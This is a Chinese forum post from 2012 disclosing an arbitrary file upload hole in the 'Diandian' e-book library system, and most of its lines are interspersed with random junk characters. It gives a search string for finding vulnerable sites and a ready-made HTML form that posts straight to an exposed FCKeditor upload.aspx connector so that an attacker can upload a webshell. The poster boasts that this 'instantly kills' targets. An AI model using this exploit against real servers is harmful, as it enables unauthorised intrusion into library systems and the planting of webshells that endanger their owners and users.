主题:图书馆系统任意文件上传漏洞) I1 n6 s0 j5 g4 i
作者:冰锋刺客0 t6 G+ @. C7 I' f! r( f
厂商:点击书(dianjishu.com)
6 Q) Y Y8 t9 i 日期:2012-6-21
. K0 e, F% w# J! C - t* A8 X' y+ X- {3 ^7 s' j1 x% `
I 概述
* d0 }$ c/ x C. g. m$ G 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
E, f9 t- ~# m$ _# p$ b II 简介
- D1 Z3 G. H; \) w% W; C9 p7 f 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
0 q5 [- I4 U4 W/ o6 n6 p4 L! ~# G 补充一个漏洞
8 }. }- G! Y" x6 p- v4 ]6 ] <form id="frmUpload" enctype="multipart/form-data"
/ F' B( }+ I% p action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>' G" m& a# G2 `; l* P! m- j: l
<input id="btnUpload" type="submit" value="操翻他">
8 J9 h- E8 Y, O- {- O3 |' T </form>( y) }" `# ]9 p+ _3 Z! E8 Z7 M9 G
你们懂的
6 l' k4 W" i1 e8 T6 S 那傻逼提供还需要改包.$ A, g6 a& Q9 Q( U6 |8 A5 a ~; K
自己看了下源代码发现fckeditor& O; R3 ] m) B7 i
直接秒杀
; w. D V, h) v |
发表于 2012-9-10 21:20:59
收藏
支持
反对